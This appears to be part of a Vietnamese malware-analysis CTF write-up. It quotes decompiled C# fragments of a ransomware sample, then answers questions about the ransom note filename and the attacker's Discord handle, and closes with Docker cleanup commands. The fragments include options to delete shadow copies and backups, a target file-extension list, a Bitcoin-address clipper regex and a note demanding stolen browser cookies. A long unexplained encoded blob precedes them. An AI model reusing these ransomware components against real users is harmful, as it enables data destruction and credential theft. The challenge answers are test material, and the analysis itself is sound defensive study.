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[...string is too long...]"; // Token: 0x0400000F RID: 15 public static string appMutexStartup = "1qw0ll8p9m8uezhqhyd"; // Token: 0x04000010 RID: 16 private static string droppedMessageTextbox = "GOATEDSIGMA"; // Token: 0x04000011 RID: 17 private static bool checkAdminPrivilage = true; // Token: 0x04000012 RID: 18 private static bool checkdeleteShadowCopies = true; // Token: 0x04000013 RID: 19 private static bool checkdisableRecoveryMode = true; // Token: 0x04000014 RID: 20 private static bool checkdeleteBackupCatalog = true; // Token: 0x04000015 RID: 21 public static string appMutexStartup2 = "17CqMQFeuB3NTzJ"; // Token: 0x04000016 RID: 22 public static string appMutex2 = Program.appMutexStartup2 + Program.appMutexRun2; // Token: 0x04000017 RID: 23 public static string staticSplit = "bc"; // Token: 0x04000018 RID: 24 public static string appMutex = Program.staticSplit + Program.appMutexStartup + Program.appMutexRun; // Token: 0x04000019 RID: 25 public static readonly Regex appMutexRegex = new Regex("(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})"); // Token: 0x0400001A RID: 26 private static string[] messages = new string[] { "You have been infected by Bat", "All your files have been encrypted", "If u want them back it's simple just gimme ur Roblox / Discord cookies", "Roblox : Go tto chrome and rblx site and right click inspect and then to to applications and cookies", "then paste the whole thing to me.", "Same for discord", "", "Once ur done add me on discord User : realba3t", "and give it to me and ull get ur files.", "", "U have 15 mins", "" }; // Token: 0x0400001B RID: 27 private static string[] validExtensions = new string[] { ".txt", ".jar", ".dat", ".contact", ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".mka", ".mhtml", ".oqy", ".png", ".csv", ".py", ".sql", ".mdb", ".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd", ".pdf", ".xla", ".cub", ".dae", ".indd", ".cs", ".mp3", ".mp4", ".dwg", ".zip", ".rar", ".mov", ".rtf", ".bmp", ".mkv", ".avi", ".apk", ".lnk", ".dib", ".dic", ".dif", ".divx", ".iso", ".7zip", ".ace", ".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".jpeg", ".xz", ".mpeg", ".torrent", ".mpg", ".core", ".pdb", ".ico", ".pas", ".db", ".wmv", ".swf", ".cer", ".bak", ".backup", ".accdb", ".bay", ".p7c", ".exif", ".vss", ".raw", ".m4a", ".wma", ".flv", ".sie", ".sum", ".ibank", ".wallet", ".css", ".js", ".rb", ".crt", ".xlsm", ".xlsb", ".7z", ".cpp", ".java", ".jpe", ".ini", ".blob", ".wps", ".docm", ".wav", ".3gp", ".webm", ".m4v", ".amv", ".m4p", ".svg", ".ods", ".bk", ".vdi", ".vmdk", ".onepkg", ".accde", ".jsp", ".json", ".gif", ".log", ".gz", ".config", ".vb", ".m1v", ".sln", ".pst", ".obj", ".xlam", ".djvu", ".inc", ".cvs", ".dbf", ".tbi", ".wpd", ".dot", ".dotx", ".xltx", ".pptm", ".potx", ".potm", ".pot", ".xlw", ".xps", ".xsd", ".xsf", ".xsl", ".kmz", ".accdr", ".stm", ".accdt", ".ppam", ".pps", ".ppsm", ".1cd", ".3ds", ".3fr", ".3g2", ".accda", ".accdc", ".accdw", ".adp", ".ai", ".ai3", ".ai4", ".ai5", ".ai6", ".ai7", ".ai8", ".arw", ".ascx", ".asm", ".asmx", ".avs", ".bin", ".cfm", ".dbx", ".dcm", ".dcr", ".pict", ".rgbe", ".dwt", ".f4v", ".exr", ".kwm", ".max", ".mda", ".mde", ".mdf", ".mdw", ".mht", ".mpv", ".msg", ".myi", ".nef", ".odc", ".geo", ".swift", ".odm", ".odp", ".oft", ".orf", ".pfx", ".p12", ".pl", ".pls", ".safe", ".tab", ".vbs", ".xlk", ".xlm", ".xlt", ".xltm", ".svgz", ".slk", ".tar.gz", ".dmg", ".ps", ".psb", ".tif", ".rss", ".key", ".vob", ".epsp", ".dc3", ".iff", ".onepkg", ".onetoc2", ".opt", ".p7b", ".pam", ".r3d" }; // Token: 0x0400001C RID: 28 private static Random random = new Random(); // Token: 0x02000003 RID: 3 public static class NativeMethods { // Token: 0x06000020 RID: 32 [DllImport("user32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool AddClipboardFormatListener(IntPtr hwnd); // Token: 0x06000021 RID: 33 [DllImport("user32.dll", SetLastError = true)] public static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent); // Token: 0x0400001E RID: 30 public const int clp = 797; // Token: 0x0400001F RID: 31 public static IntPtr intpreclp = new IntPtr(-3); } } } ``` Ở phần khai báo biến (variable declarations) ở gần cuối mã nguồn, mình thấy được: ```C! // Token: 0x04000010 RID: 16 private static string droppedMessageTextbox = "GOATEDSIGMA"; ``` Đây chính là tên của tệp tin "tin nhắn" (ransom note) mà malware sẽ thả vào các thư mục nó mã hóa. > Answer: GOATEDSIGMA ```bash! Hàm lookForDirectories() (dòng 392) được gọi để tìm các thư mục cần mã hóa. Một trong các thư mục đó là Desktop: string text = Program.userDir + Program.userName + "\\Desktop"; (dòng 400). Hàm encryptDirectory(text) (dòng 413) được gọi cho thư mục Desktop. Bên trong hàm encryptDirectory, sau khi mã hóa các tệp, nó sẽ tạo ra tệp tin nhắn: File.WriteAllLines(location + "/" + Program.droppedMessageTextbox, Program.messages); (dòng 257). ``` --- ### 2.10 Q10. What is the discord username of the hacker in the second malware behavior? Khá là may khi mà mình đã rev được source của con mal thứ 2 này, và mình đã thấy được luôn câu trả lời cho câu hỏi cuối này nó nằm ở ransom note:  ```C! // Token: 0x0400001A RID: 26 private static string[] messages = new string[] { "You have been infected by Bat", "All your files have been encrypted", "If u want them back it's simple just gimme ur Roblox / Discord cookies", "Roblox : Go tto chrome and rblx site and right click inspect and then to to applications and cookies", "then paste the whole thing to me.", "Same for discord", "", "Once ur done add me on discord User : realba3t", "and give it to me and ull get ur files.", "", "U have 15 mins", "" }; ``` > Answer: realba3t --- Ở đây có 1 cách khác nhanh hơn, tiện hơn mà không cần phải rev, đó là ta sẽ phân tích động luôn con malware trên anyrun, mình sẽ thấy luôn nội dung cả 2 câu 9 và 10:    Có được report:   --- ## 3. Dừng docker Chỉ cần cd vào đúng thư mục ~/Desktop/gudi (nơi có tệp docker-compose.yml) và chạy lệnh: ```bash! docker-compose down ``` Nếu bạn muốn xóa sạch cả data (volumes) của Elasticsearch: dùng thêm cờ -v: ```bash! docker-compose down -v ``` Hoặc ```powershell! ┌──(kali㉿kali)-[~/Desktop/gudi] └─$ docker stop $(docker ps -q) 91b37ede00f5 a760567fc3b7 675c1b18a240 ┌──(kali㉿kali)-[~/Desktop/gudi] └─$ docker rm 91b37ede00f5 a760567fc3b7 675c1b18a240 91b37ede00f5 a760567fc3b7 675c1b18a240 ┌──(kali㉿kali)-[~/Desktop/gudi] └─$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ``` ---